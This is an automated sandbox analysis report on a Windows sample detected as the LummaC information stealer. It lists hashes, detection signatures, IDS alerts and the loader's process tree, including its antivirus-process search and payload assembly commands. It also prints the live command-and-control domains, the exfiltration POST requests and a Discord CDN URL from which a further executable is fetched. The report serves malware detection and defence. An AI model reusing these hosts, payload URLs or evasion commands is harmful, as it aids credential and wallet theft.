Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MotivatedFunded.exe

Overview

General Information

Sample name:MotivatedFunded.exe
Analysis ID:1591972
MD5:374ec1e6084a7e4e8ce505c8eb54d157
SHA1:03328b03975f5ee6eb5859347f59d7ef50493016
SHA256:fc380182364b976cfd43503a92fe630b0709b0478fdf88adff07357bd692149e
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • MotivatedFunded.exe (PID: 3852 cmdline: "C:\Users\user\Desktop\MotivatedFunded.exe" MD5: 374EC1E6084A7E4E8CE505C8EB54D157)
    • cmd.exe (PID: 2300 cmdline: "C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3920 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4336 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6600 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3480 cmdline: cmd /c md 755831 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 3228 cmdline: extrac32 /Y /E Delhi MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 6556 cmdline: findstr /V "jerusalem" Bangladesh MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5012 cmdline: cmd /c copy /b 755831\Dl.com + Warriors + Spas + Douglas + Sport + Msg + Garmin + Frederick + Barbados + Sv 755831\Dl.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1436 cmdline: cmd /c copy /b ..\Fw + ..\Brighton + ..\Earliest + ..\Heritage + ..\Claim + ..\Vg + ..\Hardcover + ..\Appropriate g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dl.com (PID: 5064 cmdline: Dl.com g MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 4832 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2300, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6600, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:51.030285+010020283713Unknown Traffic192.168.2.549850104.102.49.254443TCP
      2025-01-15T16:01:52.367497+010020283713Unknown Traffic192.168.2.549861188.114.96.3443TCP
      2025-01-15T16:01:53.384566+010020283713Unknown Traffic192.168.2.549870188.114.96.3443TCP
      2025-01-15T16:01:54.601533+010020283713Unknown Traffic192.168.2.549878188.114.96.3443TCP
      2025-01-15T16:01:57.403632+010020283713Unknown Traffic192.168.2.549895188.114.96.3443TCP
      2025-01-15T16:01:58.758864+010020283713Unknown Traffic192.168.2.549905188.114.96.3443TCP
      2025-01-15T16:02:00.155105+010020283713Unknown Traffic192.168.2.549913188.114.96.3443TCP
      2025-01-15T16:02:01.439573+010020283713Unknown Traffic192.168.2.549922188.114.96.3443TCP
      2025-01-15T16:02:03.680928+010020283713Unknown Traffic192.168.2.549936188.114.96.3443TCP
      2025-01-15T16:02:04.854584+010020283713Unknown Traffic192.168.2.549944162.159.135.233443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:52.863072+010020546531A Network Trojan was detected192.168.2.549861188.114.96.3443TCP
      2025-01-15T16:01:53.938385+010020546531A Network Trojan was detected192.168.2.549870188.114.96.3443TCP
      2025-01-15T16:02:04.255965+010020546531A Network Trojan was detected192.168.2.549936188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:52.863072+010020498361A Network Trojan was detected192.168.2.549861188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:53.938385+010020498121A Network Trojan was detected192.168.2.549870188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:52.367497+010020592421Domain Observed Used for C2 Detected192.168.2.549861188.114.96.3443TCP
      2025-01-15T16:01:53.384566+010020592421Domain Observed Used for C2 Detected192.168.2.549870188.114.96.3443TCP
      2025-01-15T16:01:54.601533+010020592421Domain Observed Used for C2 Detected192.168.2.549878188.114.96.3443TCP
      2025-01-15T16:01:57.403632+010020592421Domain Observed Used for C2 Detected192.168.2.549895188.114.96.3443TCP
      2025-01-15T16:01:58.758864+010020592421Domain Observed Used for C2 Detected192.168.2.549905188.114.96.3443TCP
      2025-01-15T16:02:00.155105+010020592421Domain Observed Used for C2 Detected192.168.2.549913188.114.96.3443TCP
      2025-01-15T16:02:01.439573+010020592421Domain Observed Used for C2 Detected192.168.2.549922188.114.96.3443TCP
      2025-01-15T16:02:03.680928+010020592421Domain Observed Used for C2 Detected192.168.2.549936188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:51.838296+010020592411Domain Observed Used for C2 Detected192.168.2.5546711.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.261993+010020591891Domain Observed Used for C2 Detected192.168.2.5624701.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.356372+010020591911Domain Observed Used for C2 Detected192.168.2.5536441.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.322617+010020591991Domain Observed Used for C2 Detected192.168.2.5589081.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.299901+010020592011Domain Observed Used for C2 Detected192.168.2.5598931.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.310499+010020592031Domain Observed Used for C2 Detected192.168.2.5606851.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.333690+010020592071Domain Observed Used for C2 Detected192.168.2.5604611.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.345676+010020592091Domain Observed Used for C2 Detected192.168.2.5623631.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:50.286997+010020592111Domain Observed Used for C2 Detected192.168.2.5527051.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:56.868721+010020480941Malware Command and Control Activity Detected192.168.2.549878188.114.96.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T16:01:51.730718+010028586661Domain Observed Used for C2 Detected192.168.2.549850104.102.49.254443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://aleksandr-block.com/apiAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: MotivatedFunded.exeReversingLabs: Detection: 23%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
      Source: MotivatedFunded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49850 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49861 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49878 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49895 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49905 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49944 version: TLS 1.2
      Source: MotivatedFunded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\755831\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\755831Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.5:53644 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.5:58908 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.5:62363 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.5:60461 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059241 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aleksandr-block .com) : 192.168.2.5:54671 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.5:52705 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.5:62470 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.5:59893 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49870 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49922 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49861 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49895 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49878 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49905 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49913 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.5:60685 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2059242 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aleksandr-block .com in TLS SNI) : 192.168.2.5:49936 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49850 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49861 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49861 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49878 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49870 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49870 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49936 -> 188.114.96.3:443
      Tries to resolve many domain names, but no domain seems valid
      Source: unknownDNS traffic detected: query: klipjarifaa.shop replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: HQzhESZXqNmORNSM.HQzhESZXqNmORNSM replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: bustlingwakef.click replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
      Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49861 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49850 -> 104.102.49.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49870 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49878 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49895 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49944 -> 162.159.135.233:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49905 -> 188.114.96.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49936 -> 188.114.96.3:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ESNZ04AVW4MN3ZUF8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12829Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XRC9CSRQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15017Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NNNQYNZVNRHFORGRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20555Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NWJCJ5L3NU5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1369Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YIZA1LSGAC0PNGLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 595685Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: GET /attachments/1316097521088725107/1326268620199821485/ButtsStories.exe?ex=677ecf67&is=677d7de7&hm=1e05b1f0911094424256d31f3027d83b523b5b02b9d8bf298fea63f1f6e5a38b& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cdn.discordapp.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: GET /attachments/1316097521088725107/1326268620199821485/ButtsStories.exe?ex=677ecf67&is=677d7de7&hm=1e05b1f0911094424256d31f3027d83b523b5b02b9d8bf298fea63f1f6e5a38b& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cdn.discordapp.com
      Source: global trafficDNS traffic detected: DNS query: HQzhESZXqNmORNSM.HQzhESZXqNmORNSM
      Source: global trafficDNS traffic detected: DNS query: bustlingwakef.click
      Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
      Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
      Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
      Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
      Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
      Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
      Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
      Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: aleksandr-block.com
      Source: global trafficDNS traffic detected: DNS query: klipjarifaa.shop
      Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 15:02:04 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=EsSKsXDmcHLm.dXxGEfHUoP8mEwRWEq2Rw.Eu12PVJw-1736953324-1.0.1.1-5CNa2N7oSiI7jlCvDyYizO2bkUYYHZfMO2Amrb_r_Eq5t2ddHsIHrifzY.k1axsKXrkCWIditXJpCna8fvX9Sw; path=/; expires=Wed, 15-Jan-25 15:32:04 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwtT8SQR1uXqKjr7c4QmzEr1gRXJYGGnxt8ih4qkfqYvzs3WapkKsxUxNlJAHeSthi0cfTzsN8XCXRQPVBgVIN0mCSi4PeXsCS5q4mZIRyhoBo9%2BPsl1Qzjc2e7dCeKm6Byafw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=g0DRSKagsAOIEDLLE9F.gnaoB0uWbAAAB2df4dU0fPk-1736953324952-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026bea8d8fbc47f-EWRalt-svc: h3=":443"; ma=86400
      Source: MotivatedFunded.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: MotivatedFunded.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: MotivatedFunded.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: MotivatedFunded.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: MotivatedFunded.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: MotivatedFunded.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
